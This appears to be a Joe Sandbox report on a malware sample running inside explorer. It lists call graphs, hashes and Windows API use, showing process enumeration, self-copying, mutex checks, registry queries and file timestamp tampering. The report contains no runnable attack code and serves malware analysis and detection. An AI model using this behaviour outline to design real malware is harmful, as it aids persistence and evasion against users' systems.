                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThreadUser
                                                                                          • String ID:
                                                                                          • API String ID: 1531140918-0
                                                                                          • Opcode ID: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction ID: 1db3e151d03db0a1b2d88b33ccc958aaf7204f5d63625af9f32895d8f10b8312
                                                                                          • Opcode Fuzzy Hash: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction Fuzzy Hash: D131F631218D098FE798DF1CD889BA273D1F798350F6542AAE809C3395EA74DC5187C6

                                                                                          Execution Graph

                                                                                          Execution Coverage:43%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:3.9%
                                                                                          Total number of Nodes:179
                                                                                          Total number of Limit Nodes:16
                                                                                          execution_graph 2254 83f18c8 2255 83f1919 2254->2255 2258 83f1950 2255->2258 2268 83f19a0 2258->2268 2261 83f1943 2262 83f196b SleepEx 2262->2262 2263 83f197b 2262->2263 2275 83f2194 2263->2275 2269 83f19d7 2268->2269 2270 83f1962 2269->2270 2271 83f1aa4 RtlCreateHeap 2269->2271 2270->2261 2270->2262 2272 83f1ad5 2271->2272 2272->2270 2273 83f1c2f CreateThread 2272->2273 2274 83f1c5d CreateThread 2273->2274 2295 83f3ca4 2273->2295 2274->2270 2292 83f3d80 2274->2292 2276 83f21b2 2275->2276 2300 83f49a0 2276->2300 2278 83f1990 2279 83f1d34 2278->2279 2307 83f4be0 2279->2307 2281 83f1d6f 2282 83f1da0 CreateMutexExA 2281->2282 2283 83f1dba 2282->2283 2311 83f4d50 2283->2311 2285 83f1df9 2315 83f1ea4 2285->2315 2290 83f1e61 2320 83f223c 2290->2320 2326 83f2cac 2290->2326 2293 83f3db6 2292->2293 2294 83f3d92 EnumWindows SleepEx 2292->2294 2294->2293 2294->2294 2296 83f3d5b 2295->2296 2297 83f3cc1 CreateToolhelp32Snapshot 2295->2297 2298 83f3d43 SleepEx 2297->2298 2299 83f3cd5 2297->2299 2298->2296 2298->2297 2299->2298 2301 83f49c9 2300->2301 2302 83f49d1 GetTokenInformation 2301->2302 2305 83f4a2b 2301->2305 2306 83f5280 2302->2306 2304 83f4a00 GetTokenInformation 2304->2305 2305->2278 2308 83f4c0d GetVolumeInformationA 2307->2308 2310 83f4c60 2308->2310 2310->2281 2312 83f4d72 2311->2312 2313 83f4db3 RegQueryValueExA 2312->2313 2314 83f4e06 2312->2314 2313->2312 2314->2285 2319 83f1ec8 2315->2319 2316 83f1e25 CreateFileMappingA 2316->2290 2318 83f1ffa CreateFileW 2318->2316 2319->2316 2329 83f3534 2319->2329 2321 83f226d 2320->2321 2335 83f3394 CreateFileW 2321->2335 2323 83f2282 2337 83f22dc 2323->2337 2325 83f2293 2325->2290 2327 83f3394 CreateFileW 2326->2327 2328 83f2cd7 2327->2328 2328->2290 2330 83f3555 2329->2330 2333 83f368c CoCreateInstance 2330->2333 2332 83f35b1 2332->2318 2334 83f36ea 2333->2334 2334->2332 2336 83f33e9 2335->2336 2336->2323 2342 83f232f 2337->2342 2338 83f2647 DeleteFileW DeleteFileW 2339 83f2669 2338->2339 2341 83f26b1 SleepEx RtlExitUserThread 2339->2341 2340 83f26d5 2340->2325 2341->2340 2342->2338 2342->2340 2343 b318c8 2344 b31919 2343->2344 2347 b31950 2344->2347 2357 b319a0 2347->2357 2350 b31943 2351 b3196b SleepEx 2351->2351 2352 b3197b 2351->2352 2363 b32194 2352->2363 2359 b319d7 2357->2359 2358 b31962 2358->2350 2358->2351 2359->2358 2360 b31aa4 RtlCreateHeap 2359->2360 2361 b31ad5 2360->2361 2361->2358 2362 b31c2f CreateThread CloseHandle CreateThread 2361->2362 2362->2358 2380 b33d80 2362->2380 2383 b33ca4 2362->2383 2364 b321b2 2363->2364 2391 b349a0 2364->2391 2366 b31990 2367 b31d34 2366->2367 2398 b34be0 2367->2398 2369 b31d6f 2370 b31da0 CreateMutexExA 2369->2370 2371 b31dba 2370->2371 2402 b34d50 2371->2402 2373 b31df9 2407 b31ea4 2373->2407 2378 b31e61 2419 b3223c 2378->2419 2425 b32cac 2378->2425 2381 b33d92 EnumWindows SleepEx 2380->2381 2382 b33db6 2380->2382 2381->2381 2381->2382 2384 b33cc1 CreateToolhelp32Snapshot 2383->2384 2385 b33d5b 2383->2385 2386 b33d43 SleepEx 2384->2386 2387 b33cd5 Process32First 2384->2387 2386->2384 2386->2385 2389 b33ced 2387->2389 2388 b33d3a CloseHandle 2388->2386 2389->2388 2390 b33d28 Process32Next 2389->2390 2390->2389 2392 b349c9 2391->2392 2393 b349d1 GetTokenInformation 2392->2393 2396 b34a2b 2392->2396 2397 b35280 2393->2397 2395 b34a00 GetTokenInformation 2395->2396 2396->2366 2399 b34c0d GetVolumeInformationA 2398->2399 2401 b34c60 2399->2401 2401->2369 2405 b34d72 2402->2405 2403 b34e2e ObtainUserAgentString 2403->2373 2404 b34db3 RegQueryValueExA 2404->2405 2405->2404 2406 b34e06 2405->2406 2406->2403 2409 b31ec8 2407->2409 2408 b31e25 CreateFileMappingA 2408->2378 2409->2408 2410 b31f2a DeleteFileW CopyFileW 2409->2410 2418 b31fdd 2409->2418 2410->2408 2411 b31f4a DeleteFileW 2410->2411 2414 b31f60 2411->2414 2413 b31ffa CreateFileW 2413->2408 2415 b31f95 DeleteFileW 2414->2415 2416 b31fa9 2415->2416 2434 b3487c 2416->2434 2428 b33534 2418->2428 2420 b3226d 2419->2420 2441 b33394 CreateFileW 2420->2441 2422 b32282 2443 b322dc 2422->2443 2424 b32293 2424->2378 2426 b33394 CreateFileW 2425->2426 2427 b32cd7 2426->2427 2427->2378 2429 b33555 2428->2429 2430 b33575 GetUserNameW 2429->2430 2431 b33596 2430->2431 2439 b3368c CoCreateInstance 2431->2439 2433 b335b1 2433->2413 2435 b348a3 2434->2435 2436 b348d0 SetFileAttributesW CreateFileW 2435->2436 2437 b3491b SetFileTime 2436->2437 2438 b3493c 2437->2438 2438->2418 2440 b336ea 2439->2440 2440->2433 2442 b333e9 2441->2442 2442->2422 2467 b33e6c 2443->2467 2445 b32739 2445->2424 2446 b32592 2449 b32632 2446->2449 2451 b326d5 2446->2451 2464 b325aa 2446->2464 2447 b3277a 2448 b33e6c RtlReAllocateHeap 2447->2448 2455 b327a2 2448->2455 2449->2445 2453 b32647 DeleteFileW DeleteFileW 2449->2453 2450 b3232f 2450->2445 2462 b3256e 2450->2462 2466 b3487c 3 API calls 2450->2466 2452 b33e6c RtlReAllocateHeap 2451->2452 2458 b326fd 2452->2458 2454 b32669 2453->2454 2457 b33e6c RtlReAllocateHeap 2454->2457 2455->2445 2456 b3281c RtlReAllocateHeap 2455->2456 2456->2445 2460 b32694 2457->2460 2458->2445 2461 b3281c RtlReAllocateHeap 2458->2461 2459 b33e6c RtlReAllocateHeap 2459->2464 2463 b326b1 SleepEx RtlExitUserThread 2460->2463 2461->2445 2462->2446 2462->2447 2463->2445 2464->2445 2464->2449 2464->2459 2471 b3281c 2464->2471 2466->2462 2468 b33e9b 2467->2468 2477 b34008 2468->2477 2470 b33fbb 2470->2450 2472 b32825 2471->2472 2474 b32c3f 2471->2474 2473 b34008 RtlReAllocateHeap 2472->2473 2476 b32924 2472->2476 2473->2476 2474->2464 2475 b33e6c RtlReAllocateHeap 2475->2474 2476->2474 2476->2475 2478 b3404b 2477->2478 2480 b34052 2477->2480 2478->2470 2479 b3433b RtlReAllocateHeap 2479->2480 2480->2478 2480->2479

                                                                                          Executed Functions

                                                                                          Function 00B3368C Relevance: 1.9, APIs: 1, Instructions: 404comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
                                                                                          • Instruction ID: dd4aaac73c2298b4333ea65d53d994a806922cece24c9dd8dc770428d1d4a123
                                                                                          • Opcode Fuzzy Hash: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
                                                                                          • Instruction Fuzzy Hash: 34E1DA34608A4C8FCB94EF68C885E9AB7F1FFA9305F114699E44ACB265DB70E944CB41
                                                                                          Function 00B33534 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32 ref: 00B33588
                                                                                            • Part of subcall function 00B3368C: CoCreateInstance.COMBASE ref: 00B336D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInstanceNameUser
                                                                                          • String ID:
                                                                                          • API String ID: 3213660374-0
                                                                                          • Opcode ID: 8c884506d26cdf02d1b48bf5057c53921ff6d3e6c26b0fc65ac87aae79f7f951
                                                                                          • Instruction ID: fd85b0717a7eda2640ef4adfe2bd4f56e0a665237d29c309d34210c189eea59c
                                                                                          • Opcode Fuzzy Hash: 8c884506d26cdf02d1b48bf5057c53921ff6d3e6c26b0fc65ac87aae79f7f951
                                                                                          • Instruction Fuzzy Hash: E511FB30718F4C4FCBE4EB6C940975EB6D2EBDC310F500AAEA84EC7255DA749A458781
                                                                                          Function 083F22DC Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 498filethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 105 83f22dc-83f233a call 83f3e6c 108 83f27f5 105->108 109 83f2340-83f2345 105->109 111 83f27fb-83f2815 108->111 109->108 110 83f234b-83f234e 109->110 110->108 112 83f2354-83f235f 110->112 113 83f27e5-83f27f3 call 83f52a0 112->113 114 83f2365-83f2398 call 83f4f18 112->114 113->108 113->111 114->113 120 83f239e-83f23c3 call 83f4e6c call 83f502c 114->120 125 83f23c5-83f23df 120->125 126 83f23f3 120->126 125->126 130 83f23e1-83f23f1 125->130 127 83f23f8-83f2411 call 83f502c 126->127 132 83f2417-83f242b 127->132 133 83f2584-83f258c 127->133 130->127 136 83f247e-83f2480 132->136 137 83f242d-83f2475 132->137 134 83f277a-83f27a8 call 83f3e6c 133->134 135 83f2592-83f2596 133->135 148 83f27dd-83f27e3 134->148 149 83f27aa-83f27b1 134->149 139 83f263f-83f26d0 call 83f4604 DeleteFileW * 2 call 83f34ec call 83f3e6c call 83f52a0 SleepEx RtlExitUserThread 135->139 140 83f259c-83f25a4 135->140 136->133 141 83f2486-83f24f9 call 83f52c0 136->141 137->136 139->113 143 83f25aa-83f25b7 140->143 144 83f26d5-83f2703 call 83f3e6c 140->144 185 83f24fb-83f2574 call 83f4e6c call 83f4f18 call 83f487c call 83f5224 141->185 186 83f2579-83f257f call 83f52a0 141->186 143->148 160 83f25bd-83f25c0 143->160 144->148 158 83f2709-83f2710 144->158 148->113 149->148 154 83f27b3-83f27b6 149->154 154->148 159 83f27b8-83f27d8 call 83f281c call 83f52a0 154->159 158->148 163 83f2716-83f2719 158->163 159->148 160->148 166 83f25c6-83f25ca 160->166 163->148 168 83f271f-83f2778 call 83f281c call 83f4604 call 83f52a0 163->168 170 83f25cc-83f25fa call 83f3e6c 166->170 171 83f2632-83f2639 166->171 168->148 183 83f262c-83f2630 170->183 184 83f25fc-83f2603 170->184 171->139 171->148 183->170 183->171 184->183 189 83f2605-83f2608 184->189 185->186 186->133 189->183 194 83f260a-83f2627 call 83f281c call 83f52a0 189->194 194->183
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile$ExitSleepThreadUser
                                                                                          • String ID: |:|
                                                                                          • API String ID: 2796381497-3736120136
                                                                                          • Opcode ID: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction ID: 0632c1b2ff04e66e8ab730f3ea0da643057f72d06f51438515cd41bcc75521b3
                                                                                          • Opcode Fuzzy Hash: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction Fuzzy Hash: 15E19F30318F498BDB58AB68C4587AB76D1FB98316F50452EE59FC3392DF6898428782
                                                                                          Function 00B322DC Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 498filethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 b322dc-b3233a call b33e6c 3 b32340-b32345 0->3 4 b327f5 0->4 3->4 5 b3234b-b3234e 3->5 6 b327fb-b32815 4->6 5->4 7 b32354-b3235f 5->7 8 b327e5-b327f3 call b352a0 7->8 9 b32365-b32398 call b34f18 7->9 8->4 8->6 9->8 15 b3239e-b323c3 call b34e6c call b3502c 9->15 20 b323f3 15->20 21 b323c5-b323df 15->21 22 b323f8-b32411 call b3502c 20->22 21->20 26 b323e1-b323f1 21->26 27 b32417-b3242b 22->27 28 b32584-b3258c 22->28 26->22 29 b3247e-b32480 27->29 30 b3242d-b32475 27->30 31 b32592-b32596 28->31 32 b3277a-b327a8 call b33e6c 28->32 29->28 36 b32486-b324f9 call b352c0 29->36 30->29 34 b3263f-b326d0 call b34604 DeleteFileW * 2 call b334ec call b33e6c call b352a0 SleepEx RtlExitUserThread 31->34 35 b3259c-b325a4 31->35 45 b327aa-b327b1 32->45 46 b327dd-b327e3 32->46 34->8 39 b326d5-b32703 call b33e6c 35->39 40 b325aa-b325b7 35->40 79 b324fb-b32574 call b34e6c call b34f18 call b3487c call b35224 36->79 80 b32579-b3257f call b352a0 36->80 39->46 54 b32709-b32710 39->54 40->46 56 b325bd-b325c0 40->56 45->46 50 b327b3-b327b6 45->50 46->8 50->46 55 b327b8-b327d8 call b3281c call b352a0 50->55 54->46 58 b32716-b32719 54->58 55->46 56->46 61 b325c6-b325ca 56->61 58->46 65 b3271f-b32778 call b3281c call b34604 call b352a0 58->65 67 b32632-b32639 61->67 68 b325cc-b325fa call b33e6c 61->68 65->46 67->34 67->46 77 b3262c-b32630 68->77 78 b325fc-b32603 68->78 77->67 77->68 78->77 82 b32605-b32608 78->82 79->80 80->28 82->77 87 b3260a-b32627 call b3281c call b352a0 82->87 87->77
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile$ExitSleepThreadUser
                                                                                          • String ID: |:|
                                                                                          • API String ID: 2796381497-3736120136
                                                                                          • Opcode ID: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction ID: d730ecc3f405b446897bf6b1099330f6bbd73a164dc715a8bd479f8350c4e145
                                                                                          • Opcode Fuzzy Hash: d91d37ed029c941088cdd60b12086b6f5c1a390fb29ca23f929d4654a35839fd
                                                                                          • Instruction Fuzzy Hash: E7E1B030718F488FDB58AB28C4597AA76D1FB98305F60456DE48FC3281DF78ED818782
                                                                                          Function 00B319A0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 290threadmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 210 b319a0-b319d5 211 b319d7-b319de 210->211 212 b319f7-b319fb 211->212 213 b319e0-b319f5 212->213 214 b319fd-b31a09 212->214 213->212 215 b31a20-b31a25 214->215 216 b31a0b-b31a11 214->216 218 b31a2b-b31a32 215->218 217 b31a13-b31a1e 216->217 216->218 217->218 219 b31a34-b31a3b 218->219 220 b31a3d-b31a43 218->220 219->220 221 b31a45-b31a4f 219->221 220->211 220->221 222 b31a51-b31a58 221->222 223 b31a5e-b31a76 call b31cb0 221->223 222->223 224 b31c88 222->224 223->224 228 b31a7c-b31a9e call b31cb0 223->228 226 b31c8a-b31ca8 224->226 228->224 231 b31aa4-b31ad3 RtlCreateHeap 228->231 232 b31ad5-b31aef call b34e6c 231->232 232->224 236 b31af5-b31b0d call b35224 232->236 236->232 239 b31b0f-b31b2a call b31cb0 236->239 239->224 242 b31b30-b31b4f call b31cb0 239->242 242->224 245 b31b55-b31b74 call b31cb0 242->245 245->224 248 b31b7a-b31b99 call b31cb0 245->248 248->224 251 b31b9f-b31bbe call b31cb0 248->251 251->224 254 b31bc4-b31c1f call b34a6c * 3 251->254 254->224 261 b31c21-b31c28 254->261 261->224 262 b31c2a-b31c2d 261->262 262->224 263 b31c2f-b31c7c CreateThread CloseHandle CreateThread 262->263 264 b31c84-b31c86 263->264 264->226
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$Thread$CloseHandleHeap
                                                                                          • String ID: iP+
                                                                                          • API String ID: 371905858-51890417
                                                                                          • Opcode ID: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction ID: e697d657c96d01d4d7624a9cee751c30ba8788485cf5e086117cb089126b5dde
                                                                                          • Opcode Fuzzy Hash: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction Fuzzy Hash: EE91A530218A089FCF48EF1CD8C26E573E5FB98300F645AB99C4ECF256DA34E9558B91
                                                                                          Function 00B31EA4 Relevance: 7.7, APIs: 5, Instructions: 170fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B31E25), ref: 00B31F2D
                                                                                          • CopyFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B31E25), ref: 00B31F3C
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B31E25), ref: 00B31F4D
                                                                                          • DeleteFileW.KERNEL32 ref: 00B31F98
                                                                                            • Part of subcall function 00B3487C: SetFileAttributesW.KERNEL32 ref: 00B348D8
                                                                                            • Part of subcall function 00B3487C: CreateFileW.KERNEL32 ref: 00B34902
                                                                                            • Part of subcall function 00B3487C: SetFileTime.KERNEL32 ref: 00B3492D
                                                                                          • CreateFileW.KERNEL32 ref: 00B32021
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Delete$Create$AttributesCopyTime
                                                                                          • String ID:
                                                                                          • API String ID: 642576546-0
                                                                                          • Opcode ID: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
                                                                                          • Instruction ID: c6fbcc8ebf8f2ca254ddd1bd90bec7b78be2c6e8157e00e34422180b35e1f627
                                                                                          • Opcode Fuzzy Hash: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
                                                                                          • Instruction Fuzzy Hash: 1B416030718E5C4FCBA8EF6C94597AE72D2EB98300F6045ADA84EC7386DE34DD458781
                                                                                          Function 00B33CA4 Relevance: 7.6, APIs: 5, Instructions: 72processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 304 b33ca4-b33cbb 305 b33cc1-b33cd3 CreateToolhelp32Snapshot 304->305 306 b33d5b-b33d74 304->306 307 b33d43-b33d55 SleepEx 305->307 308 b33cd5-b33ceb Process32First 305->308 307->305 307->306 309 b33d36-b33d38 308->309 310 b33d3a-b33d3d CloseHandle 309->310 311 b33ced-b33d04 call b35000 309->311 310->307 314 b33d06-b33d08 311->314 315 b33d0a-b33d18 314->315 316 b33d1c-b33d23 call b34678 314->316 315->314 318 b33d1a 315->318 319 b33d28-b33d30 Process32Next 316->319 318->319 319->309
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 2482764027-0
                                                                                          • Opcode ID: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
                                                                                          • Instruction ID: 001c91bd714fa90babff6bf653327208beea4b38ca171f727517e6061c3468b0
                                                                                          • Opcode Fuzzy Hash: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
                                                                                          • Instruction Fuzzy Hash: 5B110330208A498FEB18EF24C4887BB76D2FB88315F684AB9D44BDA696DB7489418751
                                                                                          Function 083F19A0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 290threadmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 320 83f19a0-83f19d5 321 83f19d7-83f19de 320->321 322 83f19f7-83f19fb 321->322 323 83f19fd-83f1a09 322->323 324 83f19e0-83f19f5 322->324 325 83f1a0b-83f1a11 323->325 326 83f1a20-83f1a25 323->326 324->322 327 83f1a2b-83f1a32 325->327 328 83f1a13-83f1a1e 325->328 326->327 329 83f1a3d-83f1a43 327->329 330 83f1a34-83f1a3b 327->330 328->327 329->321 331 83f1a45-83f1a4f 329->331 330->329 330->331 332 83f1a5e-83f1a76 call 83f1cb0 331->332 333 83f1a51-83f1a58 331->333 334 83f1c88 332->334 338 83f1a7c-83f1a9e call 83f1cb0 332->338 333->332 333->334 336 83f1c8a-83f1ca8 334->336 338->334 341 83f1aa4-83f1ad3 RtlCreateHeap 338->341 342 83f1ad5-83f1aef call 83f4e6c 341->342 342->334 346 83f1af5-83f1b0d call 83f5224 342->346 346->342 349 83f1b0f-83f1b2a call 83f1cb0 346->349 349->334 352 83f1b30-83f1b4f call 83f1cb0 349->352 352->334 355 83f1b55-83f1b74 call 83f1cb0 352->355 355->334 358 83f1b7a-83f1b99 call 83f1cb0 355->358 358->334 361 83f1b9f-83f1bbe call 83f1cb0 358->361 361->334 364 83f1bc4-83f1c1f call 83f4a6c * 3 361->364 364->334 371 83f1c21-83f1c28 364->371 371->334 372 83f1c2a-83f1c2d 371->372 372->334 373 83f1c2f-83f1c7c CreateThread * 2 372->373 375 83f1c84-83f1c86 373->375 375->336
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$Thread$Heap
                                                                                          • String ID: iP+
                                                                                          • API String ID: 1054751041-51890417
                                                                                          • Opcode ID: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction ID: 5cf4df986b8743a54551d9ebb3ef136d8310acdc4f986614993e2160d585db92
                                                                                          • Opcode Fuzzy Hash: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction Fuzzy Hash: 7091AD34218A088FCF48EF18E8C16A973E1FBE8311B09467D9D4ECB257DA34D9118BD6
                                                                                          Function 00B3487C Relevance: 4.6, APIs: 3, Instructions: 87filetimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCreateTime
                                                                                          • String ID:
                                                                                          • API String ID: 1986686026-0
                                                                                          • Opcode ID: f5498ff0e911ccfe91ba0c0551e8fa87a213adc709a22552d401718206ad2213
                                                                                          • Instruction ID: 13c3a17e03ac4eaaf91cf641ed573f9d098a6d4e23ad7f4f386eddbfab2ded32
                                                                                          • Opcode Fuzzy Hash: f5498ff0e911ccfe91ba0c0551e8fa87a213adc709a22552d401718206ad2213
                                                                                          • Instruction Fuzzy Hash: 8621103170CA4C8FDFA4EF69D88879E76E2FBD8301F10456DA84EC7255DA34CA458781
                                                                                          Function 00B34D50 Relevance: 3.1, APIs: 2, Instructions: 122registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 386 b34d50-b34d99 call b34e6c 390 b34e23-b34e52 call b35224 ObtainUserAgentString 386->390 391 b34d9f 386->391 393 b34da1-b34de3 call b34e6c RegQueryValueExA 391->393 397 b34e53 call b35224 393->397 398 b34de5-b34e04 call b35224 call b3502c 393->398 401 b34e58-b34e5d 397->401 398->401 407 b34e06-b34e17 398->407 403 b34e19-b34e1a 401->403 404 b34e5f 401->404 403->390 404->393 407->403
                                                                                          APIs
                                                                                          • RegQueryValueExA.KERNEL32 ref: 00B34DD5
                                                                                          • ObtainUserAgentString.URLMON ref: 00B34E3E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AgentObtainQueryStringUserValue
                                                                                          • String ID:
                                                                                          • API String ID: 4107646653-0
                                                                                          • Opcode ID: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
                                                                                          • Instruction ID: 16419d0e65ed4e58b94f83c9a7bbb131a861df65cd3dcef61159f659616b3758
                                                                                          • Opcode Fuzzy Hash: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
                                                                                          • Instruction Fuzzy Hash: 93318431608A5C8FDB18EF68E8895EA77E5FB98314F1002BAE84EC7145EF60DC4687D1
                                                                                          Function 083F1D34 Relevance: 3.1, APIs: 2, Instructions: 120synchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 083F4BE0: GetVolumeInformationA.KERNEL32 ref: 083F4C4D
                                                                                          • CreateMutexExA.KERNEL32 ref: 083F1DA7
                                                                                          • CreateFileMappingA.KERNEL32 ref: 083F1E54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$FileInformationMappingMutexVolume
                                                                                          • String ID:
                                                                                          • API String ID: 3260430491-0
                                                                                          • Opcode ID: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
                                                                                          • Instruction ID: 8938f9b4e769022745fff9d98a75e72b37e5b013540a8c9ed306dc1141fae610
                                                                                          • Opcode Fuzzy Hash: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
                                                                                          • Instruction Fuzzy Hash: 1C315D30714F488FDB65EB39D0083AF76D2EBD9306F54493E819ED6242CBB499468B86
                                                                                          Function 00B31D34 Relevance: 3.1, APIs: 2, Instructions: 120synchronizationCOMMON
                                                                                          Download Yara Rule

